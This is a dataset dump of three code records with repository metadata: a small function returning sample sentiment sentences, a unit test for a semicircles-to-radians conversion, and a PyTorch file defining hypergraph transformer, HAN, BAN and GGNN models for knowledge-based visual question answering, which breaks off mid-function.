|
2018-08-09T01:02:53.000Z
|
2020-12-20T05:09:21.000Z
|
def senteces():
return "[{\"id\": \"1\", \"sentence\": \"Grat price, fast shipping, great product.\"},{\"id\": \"2\", \"sentence\": \"@Oielayus I want to go to promote GEAR AND GROOVE but unfornately no ride there I may b going to the one in Anaheim in May though.\"},{\"id\": \"3\" , \"sentence\": \"@mja_dren2, is still sick, and worrying the orange she just ate is going to come back up... ugh.\"}]"
| 136
| 391
| 0.629902
| 64
| 408
| 4
| 0.78125
| 0.054688
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01173
| 0.164216
| 408
| 2
| 392
| 204
| 0.739003
| 0
| 0
| 0
| 0
| 0
| 0.10049
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
8f303beb4fefd2e3eec7faec7632cb6ac5d245f1
| 534
|
py
|
Python
|
slither/test/test_unit_conversions.py
|
AlexanderFabisch/slither
|
c527e0412cf89197f907a42699a554f26cb2af59
|
[
"BSD-2-Clause-FreeBSD"
] | 2
|
2021-04-23T09:06:51.000Z
|
2021-08-19T07:18:32.000Z
|
slither/test/test_unit_conversions.py
|
AlexanderFabisch/slither
|
c527e0412cf89197f907a42699a554f26cb2af59
|
[
"BSD-2-Clause-FreeBSD"
] | 2
|
2021-04-01T08:55:46.000Z
|
2022-02-20T18:00:53.000Z
|
slither/test/test_unit_conversions.py
|
AlexanderFabisch/slither
|
c527e0412cf89197f907a42699a554f26cb2af59
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
from slither.core import unit_conversions
from nose.tools import assert_equal
def test_semicircles_to_radians():
assert_equal(unit_conversions.semicircles_to_radians(0), 0)
assert_equal(unit_conversions.semicircles_to_radians(1), 1.4629180792671596e-09)
assert_equal(unit_conversions.semicircles_to_radians(1000), 1.4629180792671597e-06)
assert_equal(unit_conversions.semicircles_to_radians(1000000000), 1.4629180792671597)
assert_equal(unit_conversions.semicircles_to_radians(-1000000000), -1.4629180792671597)
| 48.545455
| 91
| 0.840824
| 68
| 534
| 6.235294
| 0.352941
| 0.212264
| 0.283019
| 0.306604
| 0.669811
| 0.669811
| 0.669811
| 0.34434
| 0.34434
| 0.34434
| 0
| 0.20122
| 0.078652
| 534
| 10
| 92
| 53.4
| 0.660569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.75
| 1
| 0.125
| true
| 0
| 0.25
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
56c2264b642eb8338f786b3242938dec111eb77f
| 33,725
|
py
|
Python
|
model.py
|
YuJungHeo/kbvqa-public
|
c04bed5c60085ac3a551a8c196e6269befce1e5b
|
[
"MIT"
] | null | null | null |
model.py
|
YuJungHeo/kbvqa-public
|
c04bed5c60085ac3a551a8c196e6269befce1e5b
|
[
"MIT"
] | null | null | null |
model.py
|
YuJungHeo/kbvqa-public
|
c04bed5c60085ac3a551a8c196e6269befce1e5b
|
[
"MIT"
] | null | null | null |
import utils
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from modules.transformer import TransformerEncoder
class ClassEmbedding(nn.Module):
def __init__(self, cfg, trainable=True):
super(ClassEmbedding, self).__init__()
idx2vocab = utils.load_files(cfg["DATASET"]["IDX2VOCAB"])
self.n_token = len(idx2vocab)
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.emb = nn.Embedding(self.n_token, self.word_emb_size)
weight_init = utils.load_files(cfg["DATASET"]["GLOVE"]).astype(np.float32)
weight_mat = torch.from_numpy(weight_init)
self.emb.load_state_dict({"weight": weight_mat})
if not trainable:
self.emb.weight.requires_grad = False
def forward(self, x):
emb = self.emb(x)
return emb
class AnswerSelector(nn.Module):
def __init__(self, cfg):
super(AnswerSelector, self).__init__()
self.av2i = utils.load_files(cfg["DATASET"]["AVOCAB2IDX"])
self.len_avocab = len(self.av2i)
self.glove_cands = utils.load_files(cfg["DATASET"]["GLOVE_ANS_CAND"]).astype(
np.float32
)
self.glove_cands = torch.from_numpy(self.glove_cands).cuda()
def forward(self, inputs):
similarity = torch.matmul(inputs, self.glove_cands.transpose(0, 1))
pred = F.log_softmax(similarity, dim=1)
return pred
class HypergraphTransformer(nn.Module):
def __init__(self, cfg, args):
super(HypergraphTransformer, self).__init__()
self.cfg = cfg
self.args = args
self.n_hop = args.n_hop
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.max_num_hqnode = cfg["MODEL"]["NUM_MAX_QNODE"]
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.max_num_hknode = cfg["MODEL"]["NUM_MAX_KNODE_{}H".format(self.n_hop)]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.n_ans = cfg["MODEL"]["NUM_ANS"]
self.abl_only_ga = args.abl_only_ga
self.abl_only_sa = args.abl_only_sa
if "pql" in args.data_name:
self.i2e = ClassEmbedding(cfg, False) # pql : small dataset
else:
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
if self.abl_only_sa != True:
self.trans_k_with_q = self.get_network(self_type="kq")
self.trans_q_with_k = self.get_network(self_type="qk")
if self.abl_only_ga != True:
self.trans_k_mem = self.get_network(self_type="k_mem", layers=3)
self.trans_q_mem = self.get_network(self_type="q_mem", layers=3)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.out_dropout = 0.0
if self.args.abl_ans_fc != True:
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_out)
self.ans_selector = AnswerSelector(cfg)
else:
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_ans)
def get_network(self, self_type="", layers=-1):
if self_type in ["kq", "k_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_K"]
elif self_type in ["qk", "q_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_Q"]
else:
raise ValueError("Unknown network type")
return TransformerEncoder(
embed_dim=embed_dim,
num_heads=self.cfg["MODEL"]["NUM_HEAD"],
layers=max(self.cfg["MODEL"]["NUM_LAYER"], layers),
attn_dropout=attn_dropout,
relu_dropout=self.cfg["MODEL"]["RELU_DROPOUT"],
res_dropout=self.cfg["MODEL"]["RES_DROPOUT"],
embed_dropout=self.cfg["MODEL"]["EMB_DROPOUT"],
attn_mask=self.cfg["MODEL"]["ATTN_MASK"],
fc_hid_coeff=self.cfg["MODEL"]["FC_HID_COEFF"],
)
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_kg = he_kg.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_kg = torch.reshape(self.i2e(he_kg), (num_batch, num_he_kg, -1))
he_ques = self.q2h(he_ques)
he_kg = self.k2h(he_kg)
he_ques = self.dropout(he_ques)
he_kg = self.dropout(he_kg)
he_ques = he_ques.permute(1, 0, 2)
he_kg = he_kg.permute(1, 0, 2)
if self.args.abl_only_ga == True:
h_k_with_q = self.trans_k_with_q(he_kg, he_ques, he_ques)
h_ks_sum = torch.sum(h_k_with_q, axis=0)
h_q_with_k = self.trans_q_with_k(he_ques, he_kg, he_kg)
h_qs_sum = torch.sum(h_q_with_k, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
elif self.args.abl_only_sa == True:
h_ks = self.trans_k_mem(he_kg)
h_ks_sum = torch.sum(h_ks, axis=0)
h_qs = self.trans_q_mem(he_ques)
h_qs_sum = torch.sum(h_qs, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
else: # self.args.abl_only_ga == False and self.args.abl_only_sa == False:
h_k_with_q = self.trans_k_with_q(he_kg, he_ques, he_ques)
h_ks = self.trans_k_mem(h_k_with_q)
h_ks_sum = torch.sum(h_ks, axis=0)
h_q_with_k = self.trans_q_with_k(he_ques, he_kg, he_kg)
h_qs = self.trans_q_mem(h_q_with_k)
h_qs_sum = torch.sum(h_qs, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
if self.args.abl_ans_fc != True:
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)),
p=self.out_dropout,
training=self.training,
)
)
pred = self.ans_selector(output)
else:
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)),
p=self.out_dropout,
training=self.training,
)
)
pred = F.log_softmax(output, dim=1)
return pred
class HypergraphTransformer_wohe(nn.Module):
def __init__(self, cfg, args):
super(HypergraphTransformer_wohe, self).__init__()
self.cfg = cfg
self.args = args
self.n_hop = args.n_hop
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.n_ans = cfg["MODEL"]["NUM_ANS"]
self.max_num_hqnode = 1
self.max_num_hknode = 1
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
self.trans_k_with_q = self.get_network(self_type="kq")
self.trans_q_with_k = self.get_network(self_type="qk")
self.trans_k_mem = self.get_network(self_type="k_mem", layers=3)
self.trans_q_mem = self.get_network(self_type="q_mem", layers=3)
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_out)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.out_dropout = 0.0
if self.args.abl_ans_fc != True:
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_out)
self.ans_selector = AnswerSelector(cfg)
else:
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_ans)
def get_network(self, self_type="", layers=-1):
if self_type in ["kq", "k_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_K"]
elif self_type in ["qk", "q_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_Q"]
else:
raise ValueError("Unknown network type")
return TransformerEncoder(
embed_dim=embed_dim,
num_heads=self.cfg["MODEL"]["NUM_HEAD"],
layers=max(self.cfg["MODEL"]["NUM_LAYER"], layers),
attn_dropout=attn_dropout,
relu_dropout=self.cfg["MODEL"]["RELU_DROPOUT"],
res_dropout=self.cfg["MODEL"]["RES_DROPOUT"],
embed_dropout=self.cfg["MODEL"]["EMB_DROPOUT"],
attn_mask=self.cfg["MODEL"]["ATTN_MASK"],
)
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_kg = he_kg.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_kg = torch.reshape(self.i2e(he_kg), (num_batch, num_he_kg, -1))
he_ques = self.q2h(he_ques)
he_kg = self.k2h(he_kg)
he_ques = self.dropout(he_ques)
he_kg = self.dropout(he_kg)
he_ques = he_ques.permute(1, 0, 2)
he_kg = he_kg.permute(1, 0, 2)
h_k_with_q = self.trans_k_with_q(he_kg, he_ques, he_ques)
h_ks = self.trans_k_mem(h_k_with_q)
h_ks_sum = torch.sum(h_ks, axis=0)
h_q_with_k = self.trans_q_with_k(he_ques, he_kg, he_kg)
h_qs = self.trans_q_mem(h_q_with_k)
h_qs_sum = torch.sum(h_qs, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
if self.args.abl_ans_fc != True:
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)),
p=self.out_dropout,
training=self.training,
)
)
pred = self.ans_selector(output)
else:
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)),
p=self.out_dropout,
training=self.training,
)
)
pred = F.log_softmax(output, dim=1)
return pred
class HypergraphTransformer_qsetkhe(nn.Module):
def __init__(self, cfg, args):
super(HypergraphTransformer_qsetkhe, self).__init__()
self.cfg = cfg
self.args = args
self.n_hop = args.n_hop
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.max_num_hqnode = 1
self.max_num_hknode = cfg["MODEL"]["NUM_MAX_KNODE_{}H".format(self.n_hop)]
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
self.trans_k_with_q = self.get_network(self_type="kq")
self.trans_q_with_k = self.get_network(self_type="qk")
self.trans_k_mem = self.get_network(self_type="k_mem", layers=3)
self.trans_q_mem = self.get_network(self_type="q_mem", layers=3)
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_out)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.out_dropout = 0.0
self.ans_selector = AnswerSelector(cfg)
def get_network(self, self_type="", layers=-1):
if self_type in ["kq", "k_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_K"]
elif self_type in ["qk", "q_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_Q"]
else:
raise ValueError("Unknown network type")
return TransformerEncoder(
embed_dim=embed_dim,
num_heads=self.cfg["MODEL"]["NUM_HEAD"],
layers=max(self.cfg["MODEL"]["NUM_LAYER"], layers),
attn_dropout=attn_dropout,
relu_dropout=self.cfg["MODEL"]["RELU_DROPOUT"],
res_dropout=self.cfg["MODEL"]["RES_DROPOUT"],
embed_dropout=self.cfg["MODEL"]["EMB_DROPOUT"],
attn_mask=self.cfg["MODEL"]["ATTN_MASK"],
)
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_kg = he_kg.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_kg = torch.reshape(self.i2e(he_kg), (num_batch, num_he_kg, -1))
he_ques = self.q2h(he_ques)
he_kg = self.k2h(he_kg)
he_ques = self.dropout(he_ques)
he_kg = self.dropout(he_kg)
he_ques = he_ques.permute(1, 0, 2)
he_kg = he_kg.permute(1, 0, 2)
h_k_with_q = self.trans_k_with_q(he_kg, he_ques, he_ques)
h_ks = self.trans_k_mem(h_k_with_q)
h_ks_sum = torch.sum(h_ks, axis=0)
h_q_with_k = self.trans_q_with_k(he_ques, he_kg, he_kg)
h_qs = self.trans_q_mem(h_q_with_k)
h_qs_sum = torch.sum(h_qs, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)), p=self.out_dropout, training=self.training
)
)
pred = self.ans_selector(output)
return pred
class HypergraphTransformer_qhekset(nn.Module):
def __init__(self, cfg, args):
super(HypergraphTransformer_qhekset, self).__init__()
self.cfg = cfg
self.args = args
self.n_hop = args.n_hop
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.max_num_hknode = 1
self.max_num_hqnode = cfg["MODEL"]["NUM_MAX_QNODE"]
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
self.trans_k_with_q = self.get_network(self_type="kq")
self.trans_q_with_k = self.get_network(self_type="qk")
self.trans_k_mem = self.get_network(self_type="k_mem", layers=3)
self.trans_q_mem = self.get_network(self_type="q_mem", layers=3)
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_out)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.out_dropout = 0.0
self.ans_selector = AnswerSelector(cfg)
def get_network(self, self_type="", layers=-1):
if self_type in ["kq", "k_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_K"]
elif self_type in ["qk", "q_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_Q"]
else:
raise ValueError("Unknown network type")
return TransformerEncoder(
embed_dim=embed_dim,
num_heads=self.cfg["MODEL"]["NUM_HEAD"],
layers=max(self.cfg["MODEL"]["NUM_LAYER"], layers),
attn_dropout=attn_dropout,
relu_dropout=self.cfg["MODEL"]["RELU_DROPOUT"],
res_dropout=self.cfg["MODEL"]["RES_DROPOUT"],
embed_dropout=self.cfg["MODEL"]["EMB_DROPOUT"],
attn_mask=self.cfg["MODEL"]["ATTN_MASK"],
)
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_kg = he_kg.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_kg = torch.reshape(self.i2e(he_kg), (num_batch, num_he_kg, -1))
he_ques = self.q2h(he_ques)
he_kg = self.k2h(he_kg)
he_ques = self.dropout(he_ques)
he_kg = self.dropout(he_kg)
he_ques = he_ques.permute(1, 0, 2)
he_kg = he_kg.permute(1, 0, 2)
h_k_with_q = self.trans_k_with_q(he_kg, he_ques, he_ques)
h_ks = self.trans_k_mem(h_k_with_q)
h_ks_sum = torch.sum(h_ks, axis=0)
h_q_with_k = self.trans_q_with_k(he_ques, he_kg, he_kg)
h_qs = self.trans_q_mem(h_q_with_k)
h_qs_sum = torch.sum(h_qs, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)), p=self.out_dropout, training=self.training
)
)
pred = self.ans_selector(output)
return pred
class HAN(nn.Module):
def __init__(self, cfg, args):
super(HAN, self).__init__()
self.cfg = cfg
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.n_head = cfg["MODEL"]["NUM_HEAD"]
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.n_hop = args.n_hop
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.max_num_hk = cfg["MODEL"]["NUM_MAX_HK_{}H".format(self.n_hop)]
self.max_num_hknode = cfg["MODEL"]["NUM_MAX_KNODE_{}H".format(self.n_hop)]
self.max_num_hqnode = cfg["MODEL"]["NUM_MAX_QNODE"]
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
self.h2att = torch.nn.Linear(self.n_hidden, self.n_head)
self.softmax_att = torch.nn.Softmax(dim=2)
self.fc_out = torch.nn.Linear(self.n_hidden * self.n_head, self.n_out)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.ans_selector = AnswerSelector(cfg)
def multihead_att(self, he_ques, he_src):
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_src = he_src.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_src = torch.reshape(self.i2e(he_src), (num_batch, num_he_src, -1))
he_ques = self.q2h(he_ques)
he_src = self.k2h(he_src)
he_ques = self.dropout(he_ques)
he_src = self.dropout(he_src)
he_ques = he_ques.permute(0, 2, 1)
he_src = he_src.permute(0, 2, 1)
he_ques_selfatt = he_ques.unsqueeze(3)
he_src_selfatt = he_src.unsqueeze(2)
self_mul = torch.matmul(he_ques_selfatt, he_src_selfatt)
self_mul = self_mul.permute(0, 2, 3, 1)
att_map = self.h2att(self_mul)
att_map = att_map.permute(0, 3, 1, 2)
att_map = torch.reshape(att_map, (-1, self.n_head, num_he_ques * num_he_src))
att_map = self.softmax_att(att_map)
att_map = torch.reshape(att_map, (-1, self.n_head, num_he_ques, num_he_src))
he_ques = he_ques.unsqueeze(2)
he_src = he_src.unsqueeze(3)
for i in range(self.n_head):
att_g = att_map[:, i : i + 1, :, :]
att_g_t = att_g.repeat([1, self.n_hidden, 1, 1])
att_out = torch.matmul(he_ques, att_g_t)
att_out = torch.matmul(att_out, he_src)
att_out = att_out.squeeze(-1)
att_out_sq = att_out.squeeze(-1)
if i == 0:
output = att_out_sq
else:
output = torch.cat((output, att_out_sq), dim=1)
output = self.fc_out(output)
pred = self.ans_selector(output)
return pred, att_map
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
pred, att_map = self.multihead_att(he_ques, he_kg)
return pred
class BAN(nn.Module):
def __init__(self, cfg, args):
super(BAN, self).__init__()
self.cfg = cfg
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.n_head = cfg["MODEL"]["NUM_HEAD"]
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.n_hop = args.n_hop
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.max_num_hk = cfg["MODEL"]["NUM_MAX_HK_{}H".format(self.n_hop)]
self.max_num_hknode = 1
self.max_num_hqnode = 1
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
self.h2att = torch.nn.Linear(self.n_hidden, self.n_head)
self.softmax_att = torch.nn.Softmax(dim=2)
self.fc_out = torch.nn.Linear(self.n_hidden * self.n_head, self.n_out)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.ans_selector = AnswerSelector(cfg)
def multihead_att(self, he_ques, he_src, q2h, s2h):
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_src = he_src.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_src = torch.reshape(self.i2e(he_src), (num_batch, num_he_src, -1))
he_ques = q2h(he_ques)
he_src = s2h(he_src)
he_ques = self.dropout(he_ques)
he_src = self.dropout(he_src)
he_ques = he_ques.permute(0, 2, 1)
he_src = he_src.permute(0, 2, 1)
he_ques_selfatt = he_ques.unsqueeze(3)
he_src_selfatt = he_src.unsqueeze(2)
self_mul = torch.matmul(he_ques_selfatt, he_src_selfatt)
self_mul = self_mul.permute(0, 2, 3, 1)
att_map = self.h2att(self_mul)
att_map = att_map.permute(0, 3, 1, 2)
att_map = torch.reshape(att_map, (-1, self.n_head, num_he_ques * num_he_src))
att_map = self.softmax_att(att_map)
att_map = torch.reshape(att_map, (-1, self.n_head, num_he_ques, num_he_src))
he_ques = he_ques.unsqueeze(2)
he_src = he_src.unsqueeze(3)
for i in range(self.n_head):
att_g = att_map[:, i : i + 1, :, :]
att_g_t = att_g.repeat([1, self.n_hidden, 1, 1])
att_out = torch.matmul(he_ques, att_g_t)
att_out = torch.matmul(att_out, he_src)
att_out = att_out.squeeze(-1)
att_out_sq = att_out.squeeze(-1)
if i == 0:
output = att_out_sq
else:
output = torch.cat((output, att_out_sq), dim=1)
output = self.fc_out(output)
pred = self.ans_selector(output)
return pred, att_map
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
pred, att_map = self.multihead_att(he_ques, he_kg, self.q2h, self.k2h)
return pred
class GGNN(nn.Module):
"""
Reimplementation of Gated Graph Sequence Neural Networks (GGNN) by Kaihua Tang
Implementation based on https://arxiv.org/abs/1511.05493
"""
def __init__(self, cfg, args, n_node):
super(GGNN, self).__init__()
self.n_input = cfg["MODEL"]["NUM_WORD_EMB"]
self.annotation_dim = cfg["MODEL"]["NUM_ANNO"]
self.hidden_dim = cfg["MODEL"]["NUM_HIDDEN"]
self.n_edge = cfg["MODEL"]["NUM_EDGE"]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.n_steps = cfg["MODEL"]["NUM_STEP"]
self.max_num_kg = n_node
self.max_num_q = cfg["MODEL"]["NUM_MAX_Q"]
self.i2e = ClassEmbedding(cfg)
self.fc_qenc = nn.Linear(self.n_input + self.annotation_dim, self.hidden_dim)
self.fc_kenc = nn.Linear(self.n_input + self.annotation_dim, self.hidden_dim)
self.fc_in = nn.Linear(self.hidden_dim, self.hidden_dim * self.n_edge)
self.fc_out = nn.Linear(self.hidden_dim, self.hidden_dim * self.n_edge)
self.gated_update_kg = GatedPropagation(
self.hidden_dim, self.max_num_kg, self.n_edge
)
self.graph_aggregate_kg = GraphFeature(
self.hidden_dim, self.max_num_kg, self.n_edge, self.annotation_dim
)
self.gated_update_ques = GatedPropagation(
self.hidden_dim, self.max_num_q, self.n_edge
)
self.graph_aggregate_ques = GraphFeature(
self.hidden_dim, self.max_num_q, self.n_edge, self.annotation_dim
)
self.fc_output = nn.Linear(self.hidden_dim * 2, self.n_out)
self.ans_selector = AnswerSelector(cfg)
def forward(self, batch):
"""
batch: adj_matrix, annotation, entity_rep, answer
init state x: [batch_size, num_node, hidden_size]
annoatation a: [batch_size, num_node, 1]
adj matrix m: [batch_size, num_node, num_node * n_edge_types * 2]
output out: [batch_size, n_label]
"""
ques = batch[0]
adjmat_ques = batch[1]
ques_anno = batch[2]
kg = batch[3]
adjmat_kg = batch[4]
kg_anno = batch[5]
kg = self.i2e(kg)
ques = self.i2e(ques)
kg = torch.cat((kg, kg_anno), 2)
ques = torch.cat((ques, ques_anno), 2)
kg = self.fc_kenc(kg)
ques = self.fc_qenc(ques)
for i in range(self.n_steps):
in_states = self.fc_in(kg)
out_states = self.fc_out(kg)
in_states = (
in_states.view(-1, self.max_num_kg, self.hidden_dim, self.n_edge)
.transpose(2, 3)
.transpose(1, 2)
.contiguous()
)
in_states = in_states.view(
-1, self.max_num_kg * self.n_edge, self.hidden_dim
)
out_states = (
out_states.view(-1, self.max_num_kg, self.hidden_dim, self.n_edge)
.transpose(2, 3)
.transpose(1, 2)
.contiguous()
)
out_states = out_states.view(
-1, self.max_num_kg * self.n_edge, self.hidden_dim
)
kg = self.gated_update_kg(in_states, out_states, kg, adjmat_kg)
for i in range(self.n_steps):
in_states = self.fc_in(ques)
out_states = self.fc_out(ques)
in_states = (
in_states.view(-1, self.max_num_q, self.hidden_dim, self.n_edge)
.transpose(2, 3)
.transpose(1, 2)
.contiguous()
)
in_states = in_states.view(
-1, self.max_num_q * self.n_edge, self.hidden_dim
)
out_states = (
out_states.view(-1, self.max_num_q, self.hidden_dim, self.n_edge)
.transpose(2, 3)
.transpose(1, 2)
.contiguous()
)
out_states = out_states.view(
-1, self.max_num_q * self.n_edge, self.hidden_dim
)
ques = self.gated_update_ques(in_states, out_states, ques, adjmat_ques)
kg_out = self.graph_aggregate_kg(torch.cat((kg, kg_anno), 2))
ques_out = self.graph_aggregate_ques(torch.cat((ques, ques_anno), 2))
output = torch.cat((kg_out, ques_out), axis=1)
output = self.fc_output(output)
pred = self.ans_selector(output)
return pred
class GraphFeature(nn.Module):
def __init__(self, hidden_dim, n_node, n_edge, n_anno):
super(GraphFeature, self).__init__()
self.hidden_dim = hidden_dim
self.n_node = n_node
self.n_edge = n_edge
self.n_anno = n_anno
self.fc_i = nn.Linear(self.hidden_dim + self.n_anno, self.hidden_dim)
self.fc_j = nn.Linear(self.hidden_dim + self.n_anno, self.hidden_dim)
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
def forward(self, x):
x_sigm = self.sigmoid(self.fc_i(x))
x_tanh = self.tanh(self.fc_j(x))
x_new = (x_sigm * x_tanh).sum(1)
return self.tanh(x_new)
class GatedPropagation(nn.Module):
def __init__(self, hidden_dim, n_node, n_edge):
super(GatedPropagation, self).__init__()
self.hidden_dim = hidden_dim
self.n_node = n_node
self.n_edge = n_edge
self.gate_r = nn.Linear(self.hidden_dim * 3, self.hidden_dim)
self.gate_z = nn.Linear(self.hidden_dim * 3, self.hidden_dim)
self.trans = nn.Linear(self.hidden_dim * 3, self.hidden_dim)
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
def forward(self, x_in, x_out, x_curt, matrix):
matrix_in = matrix[:, :, : self.n_node * self.n_edge]
matrix_out = matrix[:, :, self.n_node * self.n_edge :]
a_in = torch.bmm(matrix_in.float(), x_in)
a_out = torch.bmm(matrix_out.float(), x_out)
a = torch.cat((a_in, a_out, x_curt), 2)
z = self.sigmoid(self.gate_z(a))
r = self.sigmoid(self.gate_r(a))
joint_input = torch.cat((a_in, a_out, r * x_curt), 2)
